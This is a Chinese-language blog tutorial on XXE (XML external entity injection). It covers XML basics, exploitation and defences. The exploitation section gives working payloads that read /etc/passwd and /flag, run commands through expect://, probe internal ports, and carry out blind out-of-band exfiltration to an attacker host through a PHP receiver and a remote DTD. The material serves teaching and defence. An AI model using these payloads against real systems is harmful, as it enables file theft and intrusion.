xxe漏洞总结

最新推荐文章于 2024-07-25 16:45:00 发布
最新推荐文章于 2024-07-25 16:45:00 发布
阅读量282 收藏 2
点赞数 1
分类专栏: Web漏洞篇 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73185293/article/details/131880977
版权

作者永不落的梦想

作者主页传送

座右铭过去属于死神,未来属于自己

本文专栏Web漏洞篇

今日鸡汤只要路是对的,就不怕路远

目录

一、XML基础

1.XML概念

2.XML文档

3.XML学习

二、XXE漏洞简介

1.原理

2.危害

三、XXE利用

1.任意文件读取

2.系统命令执行

3.探测内网端口

4.无回显XXE

四、XXE防御

一、XML基础

1.XML概念

        XML是一种用于标记电子文件使其具有结构性的可扩展标记语言;

        XML非常灵活,类似于HTML,但无固定标签,其标签可自定义,XML用于传输数据,而HTML用于显示数据;

2.XML文档

XML文档包括XML声明、DTD文档类型定义和文档元素

<!--XML声明-->
<?xml version="1.0" encoding="UTF-8"?>         <!--XML文档声明-->
<!--DTD文档类型定义-->
<!DOCTYPE root[                                <!--DTD声明-->
        <!ENTITY ha "哈哈">                    <!--一般实体、内部实体-->
        <!ENTITY % hd "哈">                  <!--参数实体、内部实体-->
        %hd;                                   <!--参数实体需在dtd中引用-->
        <!ENTITY p SYSTEM "http://192.168.1.1/mydata.dtd">   <!--外部实体,引入外部dtd文件-->
        <!ENTITY passwd SYSTEM "file:///etc/passwd">         <!--外部实体,读取外部文件-->
]>
<!--文档元素-->
<root>                             <!--自定义根元素-->
  <name>haha</name>                <!--自定义子元素,变量name=haha-->
  <ab>&ha;</ab>                    <!--引用一般实体,变量ab=哈哈-->
  <logo>%hd;</logo>                <!--引用参数实体,变量logo=哈-->
  <de>&passwd;</de>                <!--引用外部实体,变量de值为/etc/passwd文件内容-->
</root>

3.XML学习

XML 教程 | 菜鸟教程

二、XXE漏洞简介

1.原理

        XXE(XML External Entity Injection),即XML外部实体注入攻击漏洞,应用程序在解析XML时加载了恶意外部实体,造成XXE漏洞攻击;

2.危害

        ①任意文件读取;

        ②执行系统命令;

        ③探测内网端口;

三、XXE利用

1.任意文件读取

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user[
    <!ENTITY xxe SYSTEM "file:///flag">
]>
<user>
	<username>&xxe;</username>
    <password>123</password>
</user>

利用XXE漏洞读取/flag文件:

2.系统命令执行

在安装了expect扩展的php环境里可执行系统命令,如执行 ifconfig 命令:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user[
    <!ENTITY xxe SYSTEM "expect://ifconfig">
]>
<user>
	<username>&xxe;</username>
    <password>123</password>
</user>

3.探测内网端口

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user[
    <!ENTITY xxe SYSTEM "http://192.168.1.1:22/">
]>
<user>
	<username>&xxe;</username>
    <password>123</password>
</user>

4.无回显XXE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user[
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY % remote SYSTEM "http://192.168.3.10/h.dtd">
    %remote;
    %all;
    %send;
]>

攻击者主机的第一个文件,test.php:

<?php
$file = "./test.txt";
$content = base64_decode($_GET['file']);
file_put_contents($file,$content);
echo "\n";
?>

攻击者主机的第二个文件,h.dtd:

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://192.168.3.10/test.php?file=%file;'>">

最后会在攻击者主机上生成test.txt文件,内容为无回显的结果;

四、XXE防御

        ①字符串实体编码;

        ②对XML数据过滤,如关键字SYSTEM等;

        ③禁用外部实体,libxml_disable_entity_loader(true);

永不落的梦想
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xxe漏洞详解
scu_hacker博客
12-17 3708
本文详细描述了xxe漏洞的原理、利用方式、防御方法
xxe漏洞简介
u011066706的专栏
04-17 4123
xxe漏洞无法复现原因 主要是simplexml_load_file这个函数的问题,在旧版本中是默认解析实体的,但是在新版本中,已经不再默认解析实体了,需要在simplexml_load_file函数中指定第三个参数为LIBXML_NOENT,不然不会解析实体的。 xxe实体注入详解 0x00背景 XXE Injection即XML External Entity Injec
代码审计-5 XXE漏洞
xhscxj的博客
12-19 137
进行替换,并将替换后的内容进行返回。格式内容转换为数组格式赋值给。
XXE漏洞安全-全网最详细讲解】
LCW991207的博客
08-04 4664
XXE(XML External Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入,将外部实体(external entity)引用进来,然后利用这些实体来获取敏感信息或进行其他攻击。
【代码审计】CLTPHP_v5.5.3前台XML外部实体注入漏洞分析
12-02 754
0x01 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin  密码:admin123 测...
CLTPHP 漏洞
a674212706的博客
07-25 576
前言 awd小组的第一次训练 0x01 首先看一下主界面 使用的应该是PHP模板,随便翻一下找到一个注册界面 随便注册一个用户,登陆后在设置里找到一个上传点 上传我们的一句话木马 查看返回包,上传成功 访问失败,猜测返回路径可能不是绝对路径 通过报错信息查找关键词,发现存在public目录 那再把public加上再试试~ success! 菜刀连接 0x02 换个思路,网...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞利用 - 任意文件读取 XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件...
XXE - 防御策略-01
09-15
三、XXE 漏洞防御总结 为了防御 XXE 漏洞,需要采取多种防御策略,包括禁用外部实体、过滤用户提交的 XML 数据 orazing Input Validation。同时,还需要保持软件和库的最新版本,避免使用旧版本的 libxml2 库。 ...
XXE - How to become a Jedi
02-20
### XXE漏洞详解:从入门到精通 #### XXE简介 **XXE(XML External Entity)** 漏洞是一种安全漏洞,它发生在应用程序解析 XML 数据时,未能正确过滤外部实体引用的情况。当一个恶意构造的 XML 文档被传入到易受...
DoraBox 漏洞练习平台WriteUP.pdf
04-14
DoraBox 漏洞练习平台 WriteUP与总结。SQLi 数字型,数字型注入拼接语句一般为 select * from <表名> where id = x x=x' ,程序报错。 x=x and 1=1 时,语句逻辑为真,返回正常结果。 x=x and 1=2 时,语句逻辑为...
Web中间件常见漏洞总结(免积分)
02-09
在本文中,我们将深入探讨Web中间件中常见的安全漏洞,并提供相应的防范策略。 一、跨站脚本(XSS)攻击 XSS攻击是通过在网页中注入恶意脚本来实现的,攻击者可以获取用户敏感信息,如登录凭据。防范XSS攻击的关键...
网络安全之初始访问阶段攻防手段(三)
子非渔
07-25 995
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
微软蓝屏事件:网络安全的多维挑战与应对策略
sinner小屋
07-23 787
微软蓝屏事件,这一近期震动全球科技界的重大事件,起因于一次看似平常的软件更新。美国电脑安全技术公司“众击”发布的更新包中隐藏着一个致命的“缺陷”,这个缺陷如同潜伏的病毒,一旦被激活,便在全球范围内引发了连锁反应。近850万台设备,从个人电脑到关键行业的服务器,无一幸免地遭遇了系统崩溃,屏幕上只剩下一片冰冷的蓝色。这一事件不仅影响了日常办公,更是波及了航空、医疗、传媒等关键领域,造成了航班延误、医疗服务中断、信息传播受阻等一系列严重后果。
网络安全相关竞赛比赛
黑战士的博客
07-18 1088
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
中小企业常见的网络安全问题及防范措施
w651428055的博客
07-22 718
在当今数字化时代,Web应用程序已经成为企业与用户互动的主要平台,但随之而来的是日益复杂的网络安全威胁。为了保护Web应用程序免受各种攻击,Web应用程序防火墙(WAF)应运而生。本文将深入探讨WAF的概念、工作原理、分类、特点以及如何选择和部署WAF,帮助读者更全面地理解WAF在网络安全中的重要作用。
网络安全之不同阶段攻防手段(四)
子非渔
07-25 326
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
网络安全-用脚本调用系统snmpwalk命令查询并邮件报警
PanDD_0_1的博客
07-23 327
【代码】网络安全-用脚本调用系统snmpwalk命令查询并邮件报警。
网络安全入门教程(非常详细)从零基础入门到精通_网路安全 教程
最新发布
2401_85023708的博客
07-25 1978
1.入行网络安全这是一条坚持的道路,三分钟的热情可以放弃往下看了。2.多练多想,不要离开了教程什么都不会了,最好看完教程自己独立完成技术方面的开发。3.有时多百度,我们往往都遇不到好心的大神,谁会无聊天天给你做解答。4.遇到实在搞不懂的,可以先放放,以后再来解决。先科普划分一下级别(全部按小白基础,会写个表格word就行的这种)**1级:脚本小子;难度:无,**达到“黑客新闻”的部分水准(一分钱买iphone、黑掉母校官网挂女神照片什么的)网络安全工程师;
geoserver xxe漏洞
09-02
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXE(XML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值